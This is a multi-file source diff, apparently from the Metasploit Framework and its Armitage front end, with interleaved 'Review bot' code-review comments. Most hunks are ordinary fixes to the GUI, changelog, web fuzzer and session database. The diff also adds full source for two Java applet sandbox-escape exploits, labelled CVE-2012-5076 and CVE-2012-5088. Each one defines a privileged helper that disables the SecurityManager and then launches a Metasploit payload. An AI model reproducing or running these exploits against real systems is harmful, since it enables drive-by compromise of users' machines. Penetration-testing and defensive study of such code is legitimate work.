protected LinkedList buttons;
|
||||
|
||||
private static class ArmitageInstance {
|
||||
public ArmitageApplication app;
|
||||
public JToggleButton button;
|
||||
public RpcConnection client;
|
||||
}
|
||||
|
||||
public Map getClients() {
|
||||
synchronized (buttons) {
|
||||
Map r = new HashMap();
|
||||
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
ArmitageInstance temp = (ArmitageInstance)i.next();
|
||||
r.put(temp.button.getText(), temp.client);
|
||||
}
|
||||
return r;
|
||||
}
|
||||
}
|
||||
|
||||
public void setTitle(ArmitageApplication app, String title) {
|
||||
if (active == app)
|
||||
setTitle(title);
|
||||
}
|
||||
|
||||
protected ArmitageApplication active;
|
||||
|
||||
/* is localhost running? */
|
||||
public boolean checkLocal() {
|
||||
synchronized (buttons) {
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
ArmitageInstance temp = (ArmitageInstance)i.next();
|
||||
if ("localhost".equals(temp.button.getText())) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
public boolean dispatchKeyEvent(KeyEvent ev) {
|
||||
if (active != null) {
|
||||
return active.getBindings().dispatchKeyEvent(ev);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
public static final void setupLookAndFeel() {
|
||||
try {
|
||||
for (UIManager.LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) {
|
||||
if ("Nimbus".equals(info.getName())) {
|
||||
UIManager.setLookAndFeel(info.getClassName());
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception e) {
|
||||
}
|
||||
}
|
||||
|
||||
public void closeConnect() {
|
||||
synchronized (buttons) {
|
||||
if (buttons.size() == 0) {
|
||||
System.exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public void quit() {
|
||||
synchronized (buttons) {
|
||||
ArmitageInstance temp = null;
|
||||
content.remove(active);
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
temp = (ArmitageInstance)i.next();
|
||||
if (temp.app == active) {
|
||||
toolbar.remove(temp.button);
|
||||
i.remove();
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (buttons.size() == 0) {
|
||||
System.exit(0);
|
||||
}
|
||||
else if (buttons.size() == 1) {
|
||||
remove(toolbar);
|
||||
validate();
|
||||
}
|
||||
|
||||
if (i.hasNext()) {
|
||||
temp = (ArmitageInstance)i.next();
|
||||
}
|
||||
else {
|
||||
temp = (ArmitageInstance)buttons.getFirst();
|
||||
}
|
||||
|
||||
set(temp.button);
|
||||
}
|
||||
}
|
||||
|
||||
public MultiFrame() {
|
||||
super("");
|
||||
|
||||
setLayout(new BorderLayout());
|
||||
|
||||
/* setup our toolbar */
|
||||
toolbar = new JToolBar();
|
||||
|
||||
/* content area */
|
||||
content = new JPanel();
|
||||
cards = new CardLayout();
|
||||
content.setLayout(cards);
|
||||
|
||||
/* setup our stuff */
|
||||
add(content, BorderLayout.CENTER);
|
||||
|
||||
/* buttons?!? :) */
|
||||
buttons = new LinkedList();
|
||||
|
||||
/* do this ... */
|
||||
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
|
||||
/* some basic setup */
|
||||
setSize(800, 600);
|
||||
setExtendedState(JFrame.MAXIMIZED_BOTH);
|
||||
|
||||
/* all your keyboard shortcuts are belong to me */
|
||||
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(this);
|
||||
}
|
||||
|
||||
protected void set(JToggleButton button) {
|
||||
synchronized (buttons) {
|
||||
/* set all buttons to the right state */
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
ArmitageInstance temp = (ArmitageInstance)i.next();
|
||||
if (temp.button.getText().equals(button.getText())) {
|
||||
temp.button.setSelected(true);
|
||||
active = temp.app;
|
||||
setTitle(active.getTitle());
|
||||
}
|
||||
else {
|
||||
temp.button.setSelected(false);
|
||||
}
|
||||
}
|
||||
|
||||
/* show our cards? */
|
||||
cards.show(content, button.getText());
|
||||
active.touch();
|
||||
}
|
||||
}
|
||||
|
||||
public void addButton(String title, final ArmitageApplication component, RpcConnection conn) {
|
||||
synchronized (buttons) {
|
||||
final ArmitageInstance a = new ArmitageInstance();
|
||||
a.button = new JToggleButton(title);
|
||||
a.button.setToolTipText(title);
|
||||
a.app = component;
|
||||
a.client = conn;
|
||||
|
||||
a.button.addActionListener(new ActionListener() {
|
||||
public void actionPerformed(ActionEvent ev) {
|
||||
set((JToggleButton)ev.getSource());
|
||||
}
|
||||
});
|
||||
|
||||
a.button.addMouseListener(new MouseAdapter() {
|
||||
public void check(MouseEvent ev) {
|
||||
if (ev.isPopupTrigger()) {
|
||||
final JToggleButton source = a.button;
|
||||
JPopupMenu popup = new JPopupMenu();
|
||||
JMenuItem rename = new JMenuItem("Rename");
|
||||
rename.addActionListener(new ActionListener() {
|
||||
public void actionPerformed(ActionEvent ev) {
|
||||
String name = JOptionPane.showInputDialog("Rename to?", source.getText());
|
||||
if (name != null) {
|
||||
content.remove(component);
|
||||
content.add(component, name);
|
||||
source.setText(name);
|
||||
set(source);
|
||||
}
|
||||
}
|
||||
});
|
||||
popup.add(rename);
|
||||
popup.show((JComponent)ev.getSource(), ev.getX(), ev.getY());
|
||||
ev.consume();
|
||||
}
|
||||
}
|
||||
|
||||
public void mouseClicked(MouseEvent ev) {
|
||||
check(ev);
|
||||
}
|
||||
|
||||
public void mousePressed(MouseEvent ev) {
|
||||
check(ev);
|
||||
}
|
||||
|
||||
public void mouseReleased(MouseEvent ev) {
|
||||
check(ev);
|
||||
}
|
||||
});
|
||||
|
||||
toolbar.add(a.button);
|
||||
content.add(component, title);
|
||||
buttons.add(a);
|
||||
set(a.button);
|
||||
|
||||
if (buttons.size() == 1) {
|
||||
show();
|
||||
}
|
||||
else if (buttons.size() == 2) {
|
||||
add(toolbar, BorderLayout.SOUTH);
|
||||
}
|
||||
validate();
|
||||
}
|
||||
}
|
||||
}
|
|
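Review bot: the button text is used as the identity of a connection throughout `MultiFrame`, but nothing keeps it unique. `set()` selects every entry whose `temp.button.getText().equals(button.getText())`, `cards.show(content, button.getText())` and `content.add(component, name)` use it as the card key, `getClients()` uses it as the map key, and `checkLocal()` compares it to "localhost", while the Rename handler accepts any non-null string and `addButton` accepts any title. Two instances with the same title (or one renamed to an existing or empty name) will both be marked selected, one client will be dropped from the `getClients()` map, and renaming a tab to "localhost" makes `checkLocal()` return true. Reject empty and duplicate names in the rename handler and in `addButton`, and compare `temp.button == button` in `set()` instead of comparing text. A smaller point: `show()` is deprecated in favour of `setVisible(true)`, and the empty `catch (Exception e)` in `setupLookAndFeel` hides a failed look-and-feel load.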
@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel {
|
|||
check(ev);
|
||||
}
|
||||
});
|
||||
|
||||
setHorizontalAlignment(SwingConstants.CENTER);
|
||||
}
|
||||
|
||||
protected void updateIcon() {
|
||||
|
|
|
@ -1,6 +1,55 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
12 Feb 13 (tested against msf 16438)
|
||||
---------
|
||||
- Fixed a corner case preventing the display of removed host labels
|
||||
when connected to a team server.
|
||||
- Fixed RPC call cache corruption in team server mode. This bug could
|
||||
lead to some exploits defaulting to a shell payload when meterpreter
|
||||
was a possibility.
|
||||
- Slight optimization to some DB queries. I no longer pull unused
|
||||
fields making the query marginally faster. Team server is more
|
||||
efficient too as changes to unused fields won't force data (re)sync.
|
||||
- Hosts -> Clear Database now clears host labels too.
|
||||
- Added the ability to manage multiple team server instances through
|
||||
Armitage. Go to Armitage -> New Connection to connect to another
|
||||
server. A button bar will appear that allows you to switch active
|
||||
Armitage connections.
|
||||
- Credentials available across instances are pooled when using
|
||||
the [host] -> Login menu and the credential helper.
|
||||
- Rewrote the event log management code in the team server
|
||||
- Added nickname tab completion to event log. I feel like I'm writing
|
||||
an IRC client again.
|
||||
- Hosts -> Clear Database now asks you to confirm the action.
|
||||
- Hosts -> Import Hosts announces successful import to event log again.
|
||||
|
||||
23 Jan 13 (tested against msf 16351)
|
||||
---------
|
||||
- Added helpers to set EXE::Custom and EXE::Template options.
|
||||
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
|
||||
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
|
||||
check if a proxy server is up was deadlock prone. Removed it.
|
||||
- Starting SOCKS Proxy module now opens a tab displaying the module
|
||||
start process. An event is posted to the event log too.
|
||||
- Created an option helper to select credentials for SMBUser, SMBPass,
|
||||
USERNAME, and PASSWORD.
|
||||
- Added a feature to label hosts. A label will show up in its own column
|
||||
in table view or below all info in graph view. Any team member may
|
||||
change a label through [host] -> host -> Set Label. You may also use
|
||||
dynamic workspaces to show hosts with certain labels attached.
|
||||
- Fixed bad things happening when connecting Armitage to 'localhost' and
|
||||
not '127.0.0.1'.
|
||||
- Screenshots and Webcam shots are now centered in their tab.
|
||||
- Added an alternate .bat file to start msfrpcd on Windows in the
|
||||
Metasploit 4.5 installer's environment.
|
||||
- Added a color-style for [!] warning messages
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- &handler function now works as advertised.
|
||||
- Cortana now avoids use of core.setg
|
||||
|
||||
4 Jan 13 (tested against msf 16252)
|
||||
--------
|
||||
- Added a helper to set REXE option
|
||||
|
|
|
@ -0,0 +1,19 @@
|
|||
import java.security.AccessController;
|
||||
import java.security.PrivilegedExceptionAction;
|
||||
|
||||
public class B
|
||||
implements PrivilegedExceptionAction
|
||||
{
|
||||
public B()
|
||||
{
|
||||
try
|
||||
{
|
||||
AccessController.doPrivileged(this); } catch (Exception e) {
|
||||
}
|
||||
}
|
||||
|
||||
public Object run() {
|
||||
System.setSecurityManager(null);
|
||||
return new Object();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,78 @@
|
|||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import metasploit.Payload;
|
||||
//import java.lang.Runtime;
|
||||
import java.applet.Applet;
|
||||
import java.lang.invoke.MethodHandle;
|
||||
import java.lang.invoke.MethodHandles;
|
||||
import java.lang.invoke.MethodType;
|
||||
import java.lang.reflect.Method;
|
||||
import com.sun.org.glassfish.external.statistics.impl.*;
|
||||
|
||||
public class Exploit extends Applet
|
||||
{
|
||||
public static MethodHandles.Lookup test0;
|
||||
|
||||
public Exploit()
|
||||
{
|
||||
}
|
||||
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
Class c = Class.forName("java.lang.invoke.MethodHandles");
|
||||
Method m = c.getMethod("lookup", new Class[0]);
|
||||
AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
|
||||
MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
|
||||
|
||||
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
|
||||
MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
|
||||
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
|
||||
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
|
||||
|
||||
// Instance of sun.org.mozilla.javascript.internal.Context
|
||||
MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
|
||||
Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
|
||||
|
||||
// Context.createClassLoader
|
||||
MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
|
||||
Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
|
||||
|
||||
// GeneratedClassLoader.defineClass
|
||||
MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
|
||||
Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
|
||||
//New instance of the helper Class
|
||||
localClass3.newInstance();
|
||||
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
catch(Throwable ex)
|
||||
{
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
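Review bot: `java.io.IOException`, `java.io.ObjectInputStream` and `java.io.ObjectOutputStream` are imported at the top of this file but never referenced, and the `public static MethodHandles.Lookup test0` field is declared and never used. Remove them together with the commented-out `//import java.lang.Runtime;` and `//ex.printStackTrace();` lines so the checked-in source carries only what is compiled.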
@ -0,0 +1,18 @@
|
|||
# rt.jar must be in the classpath!
|
||||
|
||||
CLASSES = \
|
||||
Exploit.java \
|
||||
B.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/
|
||||
mv B.class ../../../../data/exploits/cve-2012-5076_2/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
|
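Review bot: the header comment says `rt.jar must be in the classpath!`, but the compile rule only passes `-cp "../../../../data/java"`, so the stated requirement is not enforced or explained by the Makefile itself. Document how rt.jar is expected to be supplied, or pass it explicitly. `install` also does not depend on `all` and its `mv` commands assume the destination directory already exists, so running `make install` on a clean tree fails; add the dependency, create the directory first, and declare `all`, `install` and `clean` as `.PHONY`.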
@ -0,0 +1,19 @@
|
|||
import java.security.AccessController;
|
||||
import java.security.PrivilegedExceptionAction;
|
||||
|
||||
public class B
|
||||
implements PrivilegedExceptionAction
|
||||
{
|
||||
public B()
|
||||
{
|
||||
try
|
||||
{
|
||||
AccessController.doPrivileged(this); } catch (Exception e) {
|
||||
}
|
||||
}
|
||||
|
||||
public Object run() {
|
||||
System.setSecurityManager(null);
|
||||
return new Object();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,66 @@
|
|||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import metasploit.Payload;
|
||||
//import java.lang.Runtime;
|
||||
import java.applet.Applet;
|
||||
import java.lang.invoke.MethodHandle;
|
||||
import java.lang.invoke.MethodHandles;
|
||||
import java.lang.invoke.MethodType;
|
||||
import java.lang.reflect.Method;
|
||||
|
||||
public class Exploit extends Applet
|
||||
{
|
||||
|
||||
public Exploit()
|
||||
{
|
||||
}
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
|
||||
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
|
||||
MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0);
|
||||
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
|
||||
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
|
||||
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
|
||||
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
|
||||
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
|
||||
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
|
||||
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
|
||||
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
|
||||
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
|
||||
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
|
||||
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
|
||||
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
localClass3.newInstance();
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
catch(Throwable ex)
|
||||
{
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,16 @@
|
|||
CLASSES = \
|
||||
Exploit.java \
|
||||
B.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Exploit.class ../../../../data/exploits/cve-2012-5088/
|
||||
mv B.class ../../../../data/exploits/cve-2012-5088/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
|
@ -260,7 +260,8 @@ public abstract class RpcConnection {
|
|||
// Don't fork cause we'll check if it dies
|
||||
String rpcType = "Basic";
|
||||
java.util.List args = new java.util.ArrayList(java.util.Arrays.asList(new String[]{
|
||||
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1"}));
|
||||
"msfrpcd","-f","-P",defaultPass,"-t","Msg","-U",defaultUser,"-a","127.0.0.1",
|
||||
"-p",Integer.toString(defaultPort)}));
|
||||
if(!defaultSsl)
|
||||
args.add("-S");
|
||||
if(disableDb)
|
||||
|
|
|
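Review bot: the argument list that this hunk extends with `"-p",Integer.toString(defaultPort)` still hands the RPC password to the child process on its command line (`"-P",defaultPass`), where any local user who can list processes can read it for as long as msfrpcd runs. Binding with `"-a","127.0.0.1"` keeps the listener off the network but does not protect the credential from other accounts on the same host. Since the line is being touched anyway, consider passing the password through a channel that does not appear in argv if msfrpcd offers one, and add a comment on where `defaultPass` comes from.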
@ -50,7 +50,8 @@ module Auxiliary::Login
|
|||
\n\*$ |
|
||||
(Login ?|User ?)(name|): |
|
||||
^\s*\<[a-f0-9]+\>\s*$ |
|
||||
^\s*220.*FTP
|
||||
^\s*220.*FTP|
|
||||
not\ allowed\ to\ log\ in
|
||||
)/mix
|
||||
|
||||
@waiting_regex = /(?:
|
||||
|
|
|
@ -250,7 +250,9 @@ module Auxiliary::Web
|
|||
|
||||
if !(payload = opts[:payload])
|
||||
if payloads
|
||||
payload = payloads.select{ |p| element.altered_value.include?( p ) }.first
|
||||
payload = payloads.select { |p|
|
||||
element.altered_value.include?( p )
|
||||
}.sort_by { |p| p.size }.last
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -101,7 +101,7 @@ module Analysis::Differential
|
|||
# save the response and some data for analysis
|
||||
responses[:good][elem.altered] << {
|
||||
'res' => res,
|
||||
'elem' => elem
|
||||
'elem' => elem.dup
|
||||
}
|
||||
end
|
||||
end
|
||||
|
@ -122,8 +122,7 @@ module Analysis::Differential
|
|||
http.if_not_custom_404( action, res['res'].body ) do
|
||||
# if this isn't a custom 404 page then it means that
|
||||
# the element is vulnerable, so go ahead and log the issue
|
||||
fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.',
|
||||
:payload => res['elem'].altered_value )
|
||||
fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -54,7 +54,8 @@ module Analysis::Timing
|
|||
timeout = opts[:delay]
|
||||
|
||||
seed = p.altered_value.dup
|
||||
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first
|
||||
payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.
|
||||
sort_by { |p2| p2.size }.last
|
||||
|
||||
# 1st pass, make sure the webapp is responsive
|
||||
if_responsive do
|
||||
|
|
|
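Review bot: the longest-match selection `fuzzer.payloads.select{ |pl| seed.include?( pl ) }.sort_by { |p2| p2.size }.last` duplicates the expression added to `Auxiliary::Web` earlier in this commit, and neither copy says why the longest match is preferred over the first. Move it into one helper that both call, add a one-line comment stating the intent, and use `max_by { |pl| pl.size }` so the match list is not fully sorted just to take one element. Both forms return nil when nothing matches, so the code after this line should be checked for a nil `payload`.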
@ -120,10 +120,15 @@ class Auxiliary::Web::HTTP
|
|||
|
||||
tl = []
|
||||
loop do
|
||||
# Spawn threads for each host
|
||||
while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop)
|
||||
tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request|
|
||||
request.handle_response request( request.url, request.opts )
|
||||
# Keep callback failures isolated.
|
||||
begin
|
||||
request.handle_response request( request.url, request.opts )
|
||||
rescue => e
|
||||
elog e.to_s
|
||||
e.backtrace.each { |l| elog l }
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
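Review bot: the loop condition around the new `begin`/`rescue` block, `while tl.size <= (opts[:max_threads] || 5)`, admits one more thread than the configured maximum because it uses `<=`; use `<` if `max_threads` is meant as a cap. The thread name `"#{self.class.name} - #{req})"` also carries a stray closing parenthesis. For the added `rescue => e`, logging the backtrace is good, but consider including the request URL in the first `elog` line so a failure can be tied to the request that caused it.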
@ -261,10 +266,12 @@ class Auxiliary::Web::HTTP
|
|||
end
|
||||
|
||||
def _request( url, opts = {} )
|
||||
body = opts[:body]
|
||||
body = opts[:body]
|
||||
timeout = opts[:timeout] || 10
|
||||
method = opts[:method].to_s.upcase || 'GET'
|
||||
url = url.is_a?( URI ) ? url : URI( url.to_s )
|
||||
method = opts[:method].to_s.upcase || 'GET'
|
||||
url = url.is_a?( URI ) ? url : URI( url.to_s )
|
||||
|
||||
rex_overrides = opts.delete( :rex ) || {}
|
||||
|
||||
param_opts = {}
|
||||
|
||||
|
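Review bot: `method = opts[:method].to_s.upcase || 'GET'` never falls back to 'GET': when `opts[:method]` is nil, `nil.to_s.upcase` is the empty string, which is truthy in Ruby, so `method` ends up as "". Since this line is being re-indented here, fix it at the same time, for example `(opts[:method] || 'GET').to_s.upcase`. The new `rex_overrides = opts.delete( :rex ) || {}` also mutates the hash the caller passed in; read the key with `opts[:rex]` or work on a copy so a caller that reuses its options hash does not lose the overrides on the second request.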
@ -280,10 +287,11 @@ class Auxiliary::Web::HTTP
|
|||
end
|
||||
|
||||
opts = @request_opts.merge( param_opts ).merge(
|
||||
'uri' => url.path || '/',
|
||||
'method' => method,
|
||||
'uri' => url.path || '/',
|
||||
'method' => method,
|
||||
'headers' => headers.merge( opts[:headers] || {} )
|
||||
)
|
||||
# Allow for direct rex overrides
|
||||
).merge( rex_overrides )
|
||||
|
||||
opts['data'] = body if body
|
||||
|
||||
|
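Review bot: `.merge( rex_overrides )` is applied last, so an override hash that contains 'headers' replaces the header hash built on the line above instead of adding to it, and 'uri' or 'method' in the overrides silently win over the values derived from `url` and `opts[:method]`. The comment `# Allow for direct rex overrides` should say that this precedence is intended and that keys must be strings, matching the 'uri', 'method' and 'headers' keys used here; symbol keys would be merged but not replace anything.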
@ -291,7 +299,12 @@ class Auxiliary::Web::HTTP
|
|||
Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout )
|
||||
rescue ::Timeout::Error
|
||||
Response.timed_out
|
||||
rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
|
||||
#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
|
||||
# This is bad but we can't anticipate the gazilion different types of network
|
||||
# i/o errors between Rex and Errno.
|
||||
rescue => e
|
||||
elog e.to_s
|
||||
e.backtrace.each { |l| elog l }
|
||||
Response.empty
|
||||
end
|
||||
|
||||
|
|
|
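Review bot: replacing `rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout` with a bare `rescue => e` turns every StandardError raised inside the block, including NoMethodError and ArgumentError from programming mistakes, into `Response.empty`, which callers cannot tell apart from a real network failure. If the exception list cannot be enumerated, at least rescue the families involved (for example `::SystemCallError`, `::IOError` and the Rex connection errors) and let everything else propagate. The old line is left behind as a commented-out `#rescue`, which should be deleted, and "gazilion" in the new comment is a typo.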
@ -71,7 +71,7 @@ module Auxiliary::WmapModule
|
|||
else
|
||||
res << datastore['VHOST']
|
||||
end
|
||||
res << ":" + wmap_target_port
|
||||
res << ":" + wmap_target_port.to_s
|
||||
res
|
||||
end
|
||||
|
||||
|
|
|
@ -679,8 +679,8 @@ class DBManager
|
|||
# In the case of multi handler we cannot yet determine the true
|
||||
# exploit responsible. But we can at least show the parent versus
|
||||
# just the generic handler:
|
||||
if session and session.via_exploit == "exploit/multi/handler"
|
||||
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
|
||||
if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
|
||||
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
|
||||
end
|
||||
|
||||
s = ::Mdm::Session.new(sess_data)
|
||||
|
@ -696,9 +696,9 @@ class DBManager
|
|||
|
||||
mod = framework.modules.create(session.via_exploit)
|
||||
|
||||
if session.via_exploit == "exploit/multi/handler"
|
||||
mod_fullname = sess_data[:datastore]['ParentModule']
|
||||
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
|
||||
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
|
||||
mod_fullname = sess_data[:datastore]['ParentModule']
|
||||
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
|
||||
else
|
||||
mod_name = mod.name
|
||||
mod_fullname = mod.fullname
|
||||
|
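Review bot: the added `and sess_data[:datastore]['ParentModule']` guard only proves the option is set; `::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name` on the next line still calls `.name` on nil whenever no module detail row exists for that fullname, for example when the module cache has not been populated. Keep the result of `find_by_fullname` in a local, and fall back to `mod_fullname` (or to `mod.name`) when it is nil.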
@ -720,7 +720,7 @@ class DBManager
|
|||
|
||||
vuln = framework.db.report_vuln(vuln_info)
|
||||
|
||||
if session.via_exploit == "exploit/multi/handler"
|
||||
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
|
||||
via_exploit = sess_data[:datastore]['ParentModule']
|
||||
else
|
||||
via_exploit = session.via_exploit
|
||||
|
|
|
@ -22,7 +22,9 @@ module Exploit::FileDropper
|
|||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
# read-only flag with a command.
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
if session.platform =~ /win/
|
||||
session.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
||||
end
|
||||
session.fs.file.rm(file)
|
||||
print_good("Deleted #{file}")
|
||||
true
|
||||
|
|
|
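Review bot: the new command string `%Q|attrib.exe -r #{win_file}|` drops the double quotes that the previous version had around `#{win_file}`, so unless `win_file` is quoted where it is built (not visible in this hunk), a path containing spaces is split into several arguments and any shell metacharacter in the file name is interpreted by the remote command processor. Keep the quotes. The new guard `session.platform =~ /win/` is also unanchored and matches any platform string that merely contains "win", such as one containing "darwin"; match the Windows platform names explicitly.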
@ -26,11 +26,13 @@ module Exploit::Remote::FtpServer
|
|||
], Msf::Exploit::Remote::FtpServer)
|
||||
end
|
||||
|
||||
# (see Msf::Exploit#setup)
|
||||
def setup
|
||||
super
|
||||
@state = {}
|
||||
end
|
||||
|
||||
# (see TcpServer#on_client_connect)
|
||||
def on_client_connect(c)
|
||||
@state[c] = {
|
||||
:name => "#{c.peerhost}:#{c.peerport}",
|
||||
|
@ -46,6 +48,25 @@ module Exploit::Remote::FtpServer
|
|||
c.put "220 FTP Server Ready\r\n"
|
||||
end
|
||||
|
||||
# Dispatches client requests to command handlers.
|
||||
#
|
||||
# Handlers should be named +on_client_command_*+, ending with a
|
||||
# downcased FTP verb, e.g. +on_client_command_user+. If no handler
|
||||
# exists for the given command, returns a generic default response.
|
||||
#
|
||||
# @example Handle SYST requests
|
||||
# class Metasploit4 < Msf::Exploit
|
||||
